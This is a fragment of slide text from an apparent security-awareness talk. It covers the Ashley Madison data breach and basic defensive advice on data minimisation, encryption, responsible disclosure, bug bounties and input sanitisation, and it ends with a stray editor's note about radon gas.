  • 108. 5.1 km
  • 111. 10.9 km 5.1 km 9.9 km … and probably many more!
  • 112.
  • 113. The Ashley Madison Data Breach •9.7 GB user data stolen •Search engine “Is he cheating on you?” •32 000 000 user accounts compromised •Punishment in Saudi Arabia is death (about 1200 Saudi Arabian accounts leaked) •2 people committed suicide •$567 000 000 lawsuit
  • 114. 1. Collect minimum personal information (fight Marketing if needed) 2. Ensure all collected personal data is properly protected+encrypted (when stored and in transit) 3. Ensure only authorized individuals have access to personal information (incl. internally) 4. Be extra careful with logs, error messages, testing with real data, using it with 3rd parties, etc. The Action Part
  • 115. Will my company be hacked? Yes, eventually! “It happened before, it will happen again… It is just a question of when.” -- Armageddon Movie
  • 116. Create Responsible Disclosure Policy “Please email security@mycompany.com to report any security vulnerabilities” Organize bug bounty! See hackerone.com and bugcrowd.com Choose white hats!
  • 117. The Black Hat and White Hat Book
  • 120. Links www.owasp.org Free Open Source Security Community www.sans.org SANS Institute, Certifications https://cve.mitre.org/ Common Vulnerabilities and Exposures (CVE) https://www.wired.com/category/security/ News and Updates
  • 121. To avoid comedy and drama… The Action Part: Summary 1. Don’t trust user input and always sanitize it 2. Careful with passwords, use 2FA 3. Keep your software updated and secure 4. Encrypt and store securely. 5. Be careful with sensitive data

Notas del editor

  1. Radon is a tasteless, colourless and odourless radioactive gas.